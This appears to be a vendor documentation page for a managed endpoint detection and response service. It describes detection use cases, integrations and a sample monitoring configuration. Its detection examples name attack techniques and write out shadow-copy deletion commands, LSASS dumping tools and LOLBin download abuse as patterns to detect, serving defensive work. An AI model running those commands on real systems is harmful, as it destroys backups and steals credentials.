Managed EDR
Endpoint detection and response, tuned to your environment and managed by your FDSE.
Zaun's Managed EDR module provides endpoint detection and response that's tuned to your specific environment, not generic out-of-the-box rules that generate noise.
How It Works
Your FDSE works with your EDR platform to:
- Tune detection rules to your environment, reducing false positives
- Build custom detections for threats specific to your organization
- Create runbooks for every detection, so your team knows exactly how to respond
- Review findings and provide context before escalating
Supported EDR Platforms
| Platform | Full Support | Custom Detections | Managed Response |
|---|---|---|---|
| CrowdStrike Falcon | Yes | Yes | Yes |
| SentinelOne | Yes | Yes | Yes |
| Microsoft Defender for Endpoint | Yes | Yes | Partial |
| Carbon Black | Yes | Partial | Partial |
What Zaun Adds to Your EDR
Beyond Alert Triage
Most MDR providers just triage alerts. Zaun goes further:
- Detection Engineering: Custom rules built for your environment
- Runbook Documentation: Every detection has a documented response procedure
- Weekly Coverage Shipping: New detections deployed every week
- Tuning & Optimization: Continuous reduction of false positives
Investigation Transparency
Every finding includes:
- Full evidence trail showing what was analyzed
- Detection logic explanation
- Recommended next steps from the runbook
- Historical context for similar findings
Specific Use Cases
Living-off-the-Land Binary (LOLBin) Abuse
An attacker uses legitimate Windows binaries like certutil.exe, mshta.exe, or regsvr32.exe to download and execute malicious payloads, bypassing application allowlists. Stock EDR rules generate noise on these common admin tools. Your FDSE tunes CrowdStrike Falcon or SentinelOne detections to tell the difference between legitimate admin usage and attacker abuse based on your environment's baseline.
Credential Dumping via LSASS
An attacker attempts to dump credentials from the LSASS process using tools like Mimikatz, comsvcs.dll, or ProcDump. Zaun detects the LSASS access event in CrowdStrike or Microsoft Defender for Endpoint telemetry and correlates it with the parent process, command line arguments, and user context.
Ransomware Precursor Activity
Before deploying ransomware, attackers typically disable security tools, delete shadow copies, and stage data for exfiltration. Zaun builds multi-stage detections in SentinelOne or CrowdStrike that chain together:
vssadmin delete shadowsorwmic shadowcopy delete- Service stop commands targeting backup and security services
- Rapid file enumeration across network shares
- Unusual use of archival tools like
7z.exeorrar.exe
macOS Persistence via LaunchAgent
An attacker installs a LaunchAgent or LaunchDaemon plist on macOS endpoints to maintain persistence. Default EDR rules may not cover non-standard persistence paths. Your FDSE writes custom detections for CrowdStrike Falcon that monitor plist creation in ~/Library/LaunchAgents/ and /Library/LaunchDaemons/ with exclusions for known-good software in your environment.
Lateral Movement via RDP and SMB
After initial compromise, an attacker moves laterally using Remote Desktop Protocol (RDP) or SMB with stolen credentials. Zaun detects unusual RDP login patterns, like a workstation-to-workstation RDP session or RDP from a non-admin user, by analyzing CrowdStrike or Defender authentication telemetry.
Supply Chain Binary Execution
A compromised update for a legitimate tool (e.g., a signed binary from a trusted vendor) executes unexpected child processes or makes network connections to command-and-control infrastructure. Zaun builds detections that baseline expected process trees for your installed software and flag deviations.
Linux Container Escape
An attacker breaks out of a Docker container on a production Linux host by exploiting a kernel vulnerability or misconfigured capabilities. Zaun monitors CrowdStrike Falcon for Linux or SentinelOne for container escape indicators like nsenter usage, chroot calls, or unexpected mount operations from container processes.
Integrations
| Integration | Signal Type | What It Provides |
|---|---|---|
| CrowdStrike Falcon | Endpoint telemetry | Process execution, file writes, network connections, DNS |
| SentinelOne Singularity | Endpoint telemetry | Storyline-based process trees, threat indicators |
| Microsoft Defender for Endpoint | Endpoint telemetry | Process events, network connections, file activity |
| Carbon Black Cloud | Endpoint telemetry | Process execution, binary analysis, network |
| CrowdStrike Falcon Identity | Identity signals | Lateral movement, credential theft, AD changes |
| Slack | Alert delivery | Finding notifications, runbook links, escalation |
| PagerDuty | Incident mgmt | On-call routing, incident creation, escalation |
| Jira | Ticketing | Finding tracking, investigation documentation |
| MITRE ATT&CK | Framework | Detection mapping to techniques and sub-techniques |
Configuration
# Example: EDR monitoring policy
edr:
platform: crowdstrike
monitoring:
- process_execution
- file_modifications
- network_connections
- registry_changes
custom_detections:
enabled: true
auto_deploy: false # Require FDSE review before deployment
alerting:
severity_threshold: medium
channels:
- slack: "#security-alerts"
- pagerduty: security-oncallNext Steps
- Cloud Security - Detect risky changes across cloud and SaaS
- Identity + OAuth - Monitor identity threats
- Integrations - Connect your EDR platform